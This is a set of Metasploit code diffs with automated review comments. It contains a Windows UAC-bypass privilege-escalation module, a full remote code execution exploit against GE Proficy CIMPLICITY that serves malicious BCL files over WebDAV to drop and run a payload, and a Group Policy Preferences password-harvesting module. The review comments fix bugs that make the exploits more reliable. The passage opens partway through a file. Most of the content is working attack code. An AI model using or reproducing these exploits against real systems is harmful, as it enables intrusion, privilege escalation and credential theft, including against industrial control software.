cmd_exec("cmd.exe", "/c del \"#{expand_path("%TEMP%")}\\w7e*.tmp\"" )
|
||||||
|
end
|
||||||
|
|
||||||
|
def path_bypass
|
||||||
|
@bypass_path ||= "#{expand_path("%TEMP%")}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}.exe"
|
||||||
|
end
|
||||||
|
|
||||||
|
def path_payload
|
||||||
|
@payload_path ||= "#{expand_path("%TEMP%")}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}.exe"
|
||||||
|
end
|
||||||
|
|
||||||
|
def upload_binaries!
|
||||||
|
print_status("Uploaded the agent to the filesystem....")
|
||||||
#
|
#
|
||||||
# Generate payload and random names for upload
|
# Generate payload and random names for upload
|
||||||
#
|
#
|
||||||
payload = generate_payload_exe
|
payload = generate_payload_exe
|
||||||
|
|
||||||
# randomize the bypass_uac_filename
|
|
||||||
bypass_uac_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
|
|
||||||
|
|
||||||
# randomize the payload exe name
|
|
||||||
payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
|
|
||||||
|
|
||||||
# path to the bypassuac binary
|
# path to the bypassuac binary
|
||||||
path = ::File.join(Msf::Config.data_directory, "post")
|
path = ::File.join(Msf::Config.data_directory, "post")
|
||||||
|
|
||||||
|
@ -126,36 +127,55 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
bpexe = ::File.join(path, "bypassuac-x86.exe")
|
bpexe = ::File.join(path, "bypassuac-x86.exe")
|
||||||
end
|
end
|
||||||
|
|
||||||
tmpdir = expand_path("%TEMP%")
|
|
||||||
cmd = "#{tmpdir}\\#{bypass_uac_filename} /c #{tmpdir}\\#{payload_filename}"
|
|
||||||
|
|
||||||
print_status("Uploading the bypass UAC executable to the filesystem...")
|
print_status("Uploading the bypass UAC executable to the filesystem...")
|
||||||
|
|
||||||
begin
|
begin
|
||||||
#
|
#
|
||||||
# Upload UAC bypass to the filesystem
|
# Upload UAC bypass to the filesystem
|
||||||
#
|
#
|
||||||
upload_file("#{tmpdir}\\#{bypass_uac_filename}", bpexe)
|
upload_file("#{path_bypass}", bpexe)
|
||||||
print_status("Meterpreter stager executable #{payload.length} bytes long being uploaded..")
|
print_status("Meterpreter stager executable #{payload.length} bytes long being uploaded..")
|
||||||
#
|
|
||||||
# Upload the payload to the filesystem
|
write_file(path_payload, payload)
|
||||||
#
|
|
||||||
tempexe = tmpdir + "\\" + payload_filename
|
|
||||||
write_file(tempexe, payload)
|
|
||||||
rescue ::Exception => e
|
rescue ::Exception => e
|
||||||
print_error("Error uploading file #{bypass_uac_filename}: #{e.class} #{e}")
|
print_error("Error uploading file #{path_bypass}: #{e.class} #{e}")
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status("Uploaded the agent to the filesystem....")
|
|
||||||
|
|
||||||
# execute the payload
|
|
||||||
cmd_exec(cmd)
|
|
||||||
|
|
||||||
# delete the uac bypass payload
|
|
||||||
delete_file = "#{tmpdir}\\#{bypass_uac_filename}"
|
|
||||||
|
|
||||||
file_rm(delete_file)
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def runas_method
|
||||||
|
payload = generate_payload_exe
|
||||||
|
payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
|
||||||
|
tmpdir = expand_path("%TEMP%")
|
||||||
|
tempexe = tmpdir + "\\" + payload_filename
|
||||||
|
write_file(tempexe, payload)
|
||||||
|
print_status("Uploading payload: #{tempexe}")
|
||||||
|
session.railgun.shell32.ShellExecuteA(nil,"runas",tempexe,nil,nil,5)
|
||||||
|
print_status("Payload executed")
|
||||||
|
end
|
||||||
|
|
||||||
|
def validate_environment!
|
||||||
|
fail_with(Exploit::Failure::None, 'Already in elevated state') if is_admin? or is_system?
|
||||||
|
#
|
||||||
|
# Verify use against Vista+
|
||||||
|
#
|
||||||
|
winver = sysinfo["OS"]
|
||||||
|
|
||||||
|
unless winver =~ /Windows Vista|Windows 2008|Windows [78]/
|
||||||
|
fail_with(Exploit::Failure::NotVulnerable, "#{winver} is not vulnerable.")
|
||||||
|
end
|
||||||
|
|
||||||
|
if is_uac_enabled?
|
||||||
|
print_status "UAC is Enabled, checking level..."
|
||||||
|
else
|
||||||
|
if is_in_admin_group?
|
||||||
|
fail_with(Exploit::Failure::Unknown, "UAC is disabled and we are in the admin group so something has gone wrong...")
|
||||||
|
else
|
||||||
|
fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
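Review bot: `upload_binaries!` now prints `Uploaded the agent to the filesystem....` as its first statement, before either `upload_file` or `write_file` has run, and when the upload raises it only does `print_error(...)` and `return`, so `exploit` carries on to `cmd_exec_get_pid(cmd)` with a `path_bypass` that was never written. Replace the rescue body with `fail_with(Exploit::Failure::Unknown, "Error uploading file #{path_bypass}: #{e.class} #{e}")` and move the status line below the `begin`/`end` block. In `exploit`, `::Timeout.timeout(30)` is not rescued, so when no session appears within 30 s the `Timeout::Error` skips `session.sys.process.kill(pid)` and the `file_rm` cleanup the method already performs; wrapping the wait in `begin … rescue ::Timeout::Error … ensure` with the cleanup in the `ensure` keeps that path consistent. The architecture-dependent selection above `bpexe = ::File.join(path, "bypassuac-x86.exe")` is outside the hunk, so I cannot tell whether the new `Windows x64` target picks an x64 binary.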
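--- /dev/null
+++ b/[PATH NOT SHOWN ON PAGE]
@@ -0,0 +1,315 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+Rank = ExcellentRanking
+
+include Msf::Auxiliary::Report
+include Msf::Exploit::EXE
+include Msf::Exploit::Remote::HttpClient
+include Msf::Exploit::Remote::HttpServer::HTML
+
+def initialize
+super(
+'Name' => 'GE Proficy CIMPLICITY gefebt.exe Remote Code Execution',
+'Description' => %q{
+This module abuses the gefebt.exe component in GE Proficy CIMPLICITY, reachable through the
+CIMPLICIY CimWebServer. The vulnerable component allows to execute remote BCL files in
+shared resources. An attacker can abuse this behaviour to execute a malicious BCL and
+drop an arbitrary EXE. The last one can be executed remotely through the WebView server.
+This module has been tested successfully in GE Proficy CIMPLICITY 7.5 with the embedded
+CimWebServer. This module starts a WebDAV server to provide the malicious BCL files. When
+the target hasn't the WebClient service enabled, an external SMB service is necessary.
+},
+'Author' => [
+'amisto0x07', # Vulnerability discovery
+'Z0mb1E', # Vulnerability discovery
+'juan vazquez' # Metasploit module
+],
+'References' =>
+[
+[ 'CVE', '2014-0750'],
+[ 'ZDI', '14-015' ],
+[ 'URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-023-01' ]
+],
+'Stance' => Msf::Exploit::Stance::Aggressive,
+'Platform' => 'win',
+'Targets' =>
+[
+[ 'GE Proficy CIMPLICITY 7.5 (embedded CimWebServer)', { } ]
+],
+'DefaultTarget' => 0,
+'Privileged' => true,
+'DisclosureDate' => 'Jan 23 2014'
+)
+register_options(
+[
+Opt::RPORT(80),
+OptString.new('URIPATH', [ true, 'The URI to use (do not change)', '/' ]),
+OptPort.new('SRVPORT', [ true, 'The daemon port to listen on (do not change)', 80 ]),
+OptString.new('UNCPATH', [ false, 'Override the UNC path to use.' ]),
+OptBool.new('ONLYMAKE', [ false, 'Just generate the malicious BCL files for using with an external SMB server.', true ]),
+OptString.new('TARGETURI', [true, 'The base path to the CimWeb', '/'])
+], self.class)
+end
+
+def on_request_uri(cli, request)
+case request.method
+when 'OPTIONS'
+process_options(cli, request)
+when 'PROPFIND'
+process_propfind(cli, request)
+when 'GET'
+process_get(cli, request)
+else
+vprint_status("#{request.method} => 404 (#{request.uri})")
+resp = create_response(404, "Not Found")
+resp.body = ""
+resp['Content-Type'] = 'text/html'
+cli.send_response(resp)
+end
+end
+
+def process_get(cli, request)
+if request.uri =~ /#{@basename}(\d)\.bcl/
+print_status("GET => Payload")
+data = @bcls[$1.to_i]
+send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
+return
+end
+
+# Anything else is probably a request for a data file...
+vprint_status("GET => DATA (#{request.uri})")
+data = rand_text_alpha(8 + rand(10))
+send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
+end
+
+#
+# OPTIONS requests sent by the WebDav Mini-Redirector
+#
+def process_options(cli, request)
+vprint_status("OPTIONS #{request.uri}")
+headers = {
+'MS-Author-Via' => 'DAV',
+'DASL' => '<DAV:sql>',
+'DAV' => '1, 2',
+'Allow' => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH',
+'Public' => 'OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK',
+'Cache-Control' => 'private'
+}
+resp = create_response(207, "Multi-Status")
+headers.each_pair {|k,v| resp[k] = v }
+resp.body = ""
+resp['Content-Type'] = 'text/xml'
+cli.send_response(resp)
+end
+
+#
+# PROPFIND requests sent by the WebDav Mini-Redirector
+#
+def process_propfind(cli, request)
+path = request.uri
+print_status("Received WebDAV PROPFIND request")
+body = ''
+
+if (path =~ /\.bcl$/i)
+print_status("Sending BCL multistatus for #{path} ...")
+body = %Q|<?xml version="1.0"?>
+<a:multistatus xmlns:b="urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/" xmlns:c="xml:" xmlns:a="DAV:">
+<a:response>
+</a:response>
+</a:multistatus>
+|
+elsif (path =~ /\/$/) or (not path.sub('/', '').index('/'))
+# Response for anything else (generally just /)
+print_status("Sending directory multistatus for #{path} ...")
+body = %Q|<?xml version="1.0" encoding="utf-8"?>
+<D:multistatus xmlns:D="DAV:">
+<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
+<D:href>#{path}</D:href>
+<D:propstat>
+<D:prop>
+<lp1:resourcetype><D:collection/></lp1:resourcetype>
+<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate>
+<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified>
+<lp1:getetag>"39e0001-1000-4808c3ec95000"</lp1:getetag>
+<D:lockdiscovery/>
+<D:getcontenttype>httpd/unix-directory</D:getcontenttype>
+</D:prop>
+<D:status>HTTP/1.1 200 OK</D:status>
+</D:propstat>
+</D:response>
+</D:multistatus>
+|
+else
+print_status("Sending 404 for #{path} ...")
+send_not_found(cli)
+return
+end
+
+# send the response
+resp = create_response(207, "Multi-Status")
+resp.body = body
+resp['Content-Type'] = 'text/xml'
+cli.send_response(resp)
+end
+
+def check
+uri = normalize_uri(target_uri.to_s, "CimWeb", "gefebt.exe")
+uri << "?"
+
+res = send_request_cgi('uri' => uri)
+
+# res.to_s is used because the CIMPLICITY embedded web server
+# doesn't send HTTP compatible responses.
+if res and res.code == 200 and res.to_s =~ /Usage.*gefebt\.exe/
+return Exploit::CheckCode::Detected
+end
+
+Exploit::CheckCode::Unknown
+end
+
+def exploit
+@extensions = "bcl"
+@bcls= []
+@total_exe = 0
+
+setup_resources
+
+make_bcls
+
+print_status("BCL's available at #{@exploit_unc}#{@share_name}\\#{@basename}{i}.bcl")
+
+unless datastore['UNCPATH'].blank?
+@bcls.each_index { |i| file_create("#{@basename}#{i}.bcl", @bcls[i]) }
+if datastore['ONLYMAKE']
+print_warning("Files created, remember to upload the BCL files to the remote share!")
+print_warning("Once ready set ONLYMAKE to false")
+else
+exploit_bcl
+end
+return
+end
+
+super
+end
+
+def setup_resources
+if datastore['UNCPATH'].blank?
+# Using WebDAV
+my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
+@basename = rand_text_alpha(3)
+@share_name = rand_text_alpha(3)
+@exploit_unc = "\\\\#{my_host}\\"
+@exe_filename = "#{rand_text_alpha(3 + rand(4))}.exe"
+unless datastore['SRVPORT'].to_i == 80 && datastore['URIPATH'] == '/'
+fail_with(Failure::BadConfig, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')
+end
+else
+# Using external SMB Server
+if datastore['UNCPATH'] =~ /(\\\\[^\\]*\\)([^\\]*)\\([^\\]*)\.bcl/
+@exploit_unc = $1
+@share_name = $2
+@basename = $3
+# Use an static file name for the EXE since the module doesn't
+# deliver the BCL files in this case.
+@exe_filename = "ge_pld.exe"
+else
+fail_with(Failure::BadConfig, 'Bad UNCPATH format, should be \\\\host\\shared_folder\\base_name.blc')
+end
+end
+end
+
+def make_bcls
+exe = generate_payload_exe
+# Padding to be sure we're aligned to 4 bytes.
+exe << "\x00" until exe.length % 4 == 0
+longs = exe.unpack("l*")
+offset = 0
+
+# gefebt.exe isn't able to handle (on my test environment) long
+# arrays bigger than 16000, so we need to split it.
+while longs.length > 0
+parts = longs.slice!(0, 16000)
+@bcls << generate_bcl(parts , offset)
+offset += parts.length * 4
+end
+end
+
+def generate_bcl(slices, offset)
+bcl_payload = ""
+
+slices.each_index do |i|
+bcl_payload << "s(#{i + 1}) = #{slices[i]}\n"
+end
+
+<<-EOF
+Option CStrings On
+
+Sub Main()
+Open "#{@exe_filename}" For Binary Access Write As #1
+Dim s(#{slices.length}) As Long
+#{bcl_payload}
+
+For x = 1 To #{slices.length}
+t = x - 1
+Put #1,t*4+1+#{offset},s(x)
+Next x
+
+Close
+End Sub
+EOF
+end
+
+def execute_bcl(i)
+print_status("#{peer} - Executing BCL code #{@basename}#{i}.bcl to drop final payload...")
+
+uri = normalize_uri(target_uri.to_s, "CimWeb", "gefebt.exe")
+uri << "?#{@exploit_unc}#{@share_name}\\#{@basename}#{i}.bcl"
+
+res = send_request_cgi('uri' => uri)
+
+# We use res.to_s because the embedded CIMPLICITY Web server doesn't
+# answer with valid HTTP responses.
+if res and res.code == 200 and res.to_s =~ /(^Error.*$)/
+print_error("#{peer} - Server answered with error: $1")
+fail_with(Failure::Unknown, "#{peer} - Server answered with error")
+elsif res and res.code == 200 and res.to_s =~ /No such file or directory/
+fail_with(Failure::BadConfig, "#{peer} - The target wasn't able to access the remote BCL file")
+elsif res and res.code == 200
+print_good("#{peer} - Answer has been successful")
+else
+fail_with(Failure::Unknown, "#{peer} - Unknown error")
+end
+end
+
+def exploit_bcl
+@bcls.each_index do |i|
+execute_bcl(i)
+end
+
+print_status("#{peer} - Executing #{@exe_filename}...")
+uri = normalize_uri(target_uri.to_s, "CimWeb", @exe_filename)
+uri << "?"
+
+# Enough timeout to execute the payload, but don't block the exploit
+# until there is an answer.
+send_request_cgi({'uri' => uri}, 3)
+end
+
+def primer
+exploit_bcl
+service.stop
+end
+
+def file_create(fname, data)
+ltype = "exploit.fileformat.#{self.shortname}"
+full_path = store_local(ltype, nil, data, fname)
+print_good("#{fname} stored at #{full_path}")
+end
+
+end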
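Review bot: In `execute_bcl` the error branch passes `"#{peer} - Server answered with error: $1"` to `print_error`, so the user sees the literal text `$1` instead of the captured server message; it should be `print_error("#{peer} - Server answered with error: #{$1}")`. In `setup_resources` the `BadConfig` hint tells the user the UNCPATH must end in `base_name.blc`, while the regex it follows requires `\.bcl`, so the message points at the wrong extension: `fail_with(Failure::BadConfig, 'Bad UNCPATH format, should be \\\\host\\shared_folder\\base_name.bcl')`. The header comment `http//metasploit.com/download` is also missing its colon. Finally, `process_get` indexes `@bcls[$1.to_i]` with a single-digit capture and sends whatever comes back, so an index past the end of the array hands `nil` to `send_response`; a guard that answers 404 when `data.nil?` would make that failure visible instead of silent.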
@ -43,6 +43,7 @@ module Metasploit3
|
||||||
|
|
||||||
def generate_jar(opts={})
|
def generate_jar(opts={})
|
||||||
jar = Rex::Zip::Jar.new
|
jar = Rex::Zip::Jar.new
|
||||||
|
jar.add_sub("metasploit") if opts[:random]
|
||||||
@class_files.each do |path|
|
@class_files.each do |path|
|
||||||
1.upto(path.length - 1) do |idx|
|
1.upto(path.length - 1) do |idx|
|
||||||
full = path[0,idx].join("/") + "/"
|
full = path[0,idx].join("/") + "/"
|
||||||
|
|
|
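Review bot: The added `jar.add_sub("metasploit") if opts[:random]` is undocumented, and the option name does not describe what the visible line does, which is to add a fixed `metasploit` directory entry; whatever else `:random` controls happens past the end of the hunk, and `generate_jar` continues beyond it. A one-line comment above the new line, e.g. `# :random — presumably selects the randomised jar layout used by Java applet payloads; the metasploit/ directory entry is only added in that mode (TODO confirm the option's remaining effects)`, plus a mention of the `opts[:random]` key in the method's header comment, would let a reader of the new `p.encoded_jar(:random => true)` call in the applet exploit understand the contract.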
@ -10,6 +10,7 @@ require 'msf/core/auxiliary/report'
|
||||||
|
|
||||||
class Metasploit3 < Msf::Post
|
class Metasploit3 < Msf::Post
|
||||||
include Msf::Auxiliary::Report
|
include Msf::Auxiliary::Report
|
||||||
|
include Msf::Post::File
|
||||||
include Msf::Post::Windows::Priv
|
include Msf::Post::Windows::Priv
|
||||||
include Msf::Post::Windows::Registry
|
include Msf::Post::Windows::Registry
|
||||||
|
|
||||||
|
@ -22,6 +23,9 @@ class Metasploit3 < Msf::Post
|
||||||
files containing local user accounts and passwords and decrypts them
|
files containing local user accounts and passwords and decrypts them
|
||||||
using Microsofts public AES key.
|
using Microsofts public AES key.
|
||||||
|
|
||||||
|
Cached Group Policy files may be found on end-user devices if the group
|
||||||
|
policy object is deleted rather than unlinked.
|
||||||
|
|
||||||
Tested on WinXP SP3 Client and Win2k8 R2 DC.
|
Tested on WinXP SP3 Client and Win2k8 R2 DC.
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
|
@ -34,10 +38,10 @@ class Metasploit3 < Msf::Post
|
||||||
],
|
],
|
||||||
'References' =>
|
'References' =>
|
||||||
[
|
[
|
||||||
['URL', 'http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences'],
|
|
||||||
['URL', 'http://msdn.microsoft.com/en-us/library/cc232604(v=prot.13)'],
|
['URL', 'http://msdn.microsoft.com/en-us/library/cc232604(v=prot.13)'],
|
||||||
['URL', 'http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html'],
|
['URL', 'http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html'],
|
||||||
['URL', 'http://blogs.technet.com/grouppolicy/archive/2009/04/22/passwords-in-group-policy-preferences-updated.aspx']
|
['URL', 'http://blogs.technet.com/grouppolicy/archive/2009/04/22/passwords-in-group-policy-preferences-updated.aspx'],
|
||||||
|
['URL', 'https://labs.portcullis.co.uk/blog/are-you-considering-using-microsoft-group-policy-preferences-think-again/']
|
||||||
],
|
],
|
||||||
'Platform' => [ 'win' ],
|
'Platform' => [ 'win' ],
|
||||||
'SessionTypes' => [ 'meterpreter' ]
|
'SessionTypes' => [ 'meterpreter' ]
|
||||||
|
@ -65,11 +69,30 @@ class Metasploit3 < Msf::Post
|
||||||
fullpaths = []
|
fullpaths = []
|
||||||
cached_domain_controller = nil
|
cached_domain_controller = nil
|
||||||
|
|
||||||
print_status "Checking locally..."
|
print_status "Checking for group policy history objects..."
|
||||||
locals = get_basepaths(client.fs.file.expand_path("%SYSTEMROOT%\\SYSVOL\\sysvol"))
|
# Windows XP environment variable points to the correct folder.
|
||||||
|
# Windows Vista and upwards points to ProgramData!
|
||||||
|
all_users = expand_path("%ALLUSERSPROFILE%")
|
||||||
|
|
||||||
|
if all_users.include? 'ProgramData'
|
||||||
|
all_users.gsub!('ProgramData','Users\\All Users')
|
||||||
|
else
|
||||||
|
all_users = "#{all_users}\\Application Data"
|
||||||
|
end
|
||||||
|
|
||||||
|
cached = get_basepaths("#{all_users}\\Microsoft\\Group Policy\\History", true)
|
||||||
|
|
||||||
|
unless cached.blank?
|
||||||
|
basepaths << cached
|
||||||
|
print_good "Cached Group Policy folder found locally"
|
||||||
|
end
|
||||||
|
|
||||||
|
print_status "Checking for SYSVOL locally..."
|
||||||
|
system_root = expand_path("%SYSTEMROOT%")
|
||||||
|
locals = get_basepaths("#{system_root}\\SYSVOL\\sysvol")
|
||||||
unless locals.blank?
|
unless locals.blank?
|
||||||
basepaths << locals
|
basepaths << locals
|
||||||
print_good "Group Policy Files found locally"
|
print_good "SYSVOL Group Policy Files found locally"
|
||||||
end
|
end
|
||||||
|
|
||||||
# If user supplied domains this implicitly cancels the ALL flag.
|
# If user supplied domains this implicitly cancels the ALL flag.
|
||||||
|
@ -153,19 +176,27 @@ class Metasploit3 < Msf::Post
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def get_basepaths(base)
|
def get_basepaths(base, cached=false)
|
||||||
locals = []
|
locals = []
|
||||||
begin
|
begin
|
||||||
session.fs.dir.foreach(base) do |sub|
|
session.fs.dir.foreach(base) do |sub|
|
||||||
next if sub =~ /^(\.|\.\.)$/
|
next if sub =~ /^(\.|\.\.)$/
|
||||||
tpath = "#{base}\\#{sub}\\Policies"
|
|
||||||
begin
|
# Local GPO are stored in C:\Users\All Users\Microsoft\Group
|
||||||
session.fs.dir.foreach(tpath) do |sub2|
|
# Policy\History\{GUID}\Machine\etc without \Policies
|
||||||
next if sub =~ /^(\.|\.\.)$/
|
if cached
|
||||||
locals << "#{tpath}\\#{sub2}\\"
|
locals << "#{base}\\#{sub}\\"
|
||||||
|
else
|
||||||
|
tpath = "#{base}\\#{sub}\\Policies"
|
||||||
|
|
||||||
|
begin
|
||||||
|
session.fs.dir.foreach(tpath) do |sub2|
|
||||||
|
next if sub2 =~ /^(\.|\.\.)$/
|
||||||
|
locals << "#{tpath}\\#{sub2}\\"
|
||||||
|
end
|
||||||
|
rescue Rex::Post::Meterpreter::RequestError => e
|
||||||
|
print_error "Could not access #{tpath} : #{e.message}"
|
||||||
end
|
end
|
||||||
rescue Rex::Post::Meterpreter::RequestError => e
|
|
||||||
print_error "Could not access #{tpath} : #{e.message}"
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
rescue Rex::Post::Meterpreter::RequestError => e
|
rescue Rex::Post::Meterpreter::RequestError => e
|
||||||
|
@ -177,7 +208,7 @@ class Metasploit3 < Msf::Post
|
||||||
def find_path(path, xml_path)
|
def find_path(path, xml_path)
|
||||||
xml_path = "#{path}#{xml_path}"
|
xml_path = "#{path}#{xml_path}"
|
||||||
begin
|
begin
|
||||||
return xml_path if client.fs.file.stat(xml_path)
|
return xml_path if exist? xml_path
|
||||||
rescue Rex::Post::Meterpreter::RequestError => e
|
rescue Rex::Post::Meterpreter::RequestError => e
|
||||||
# No permissions for this specific file.
|
# No permissions for this specific file.
|
||||||
return nil
|
return nil
|
||||||
|
@ -186,10 +217,7 @@ class Metasploit3 < Msf::Post
|
||||||
|
|
||||||
def gpp_xml_file(path)
|
def gpp_xml_file(path)
|
||||||
begin
|
begin
|
||||||
groups = client.fs.file.new(path,'r')
|
data = read_file(path)
|
||||||
until groups.eof
|
|
||||||
data = groups.read
|
|
||||||
end
|
|
||||||
|
|
||||||
spath = path.split('\\')
|
spath = path.split('\\')
|
||||||
retobj = {
|
retobj = {
|
||||||
|
|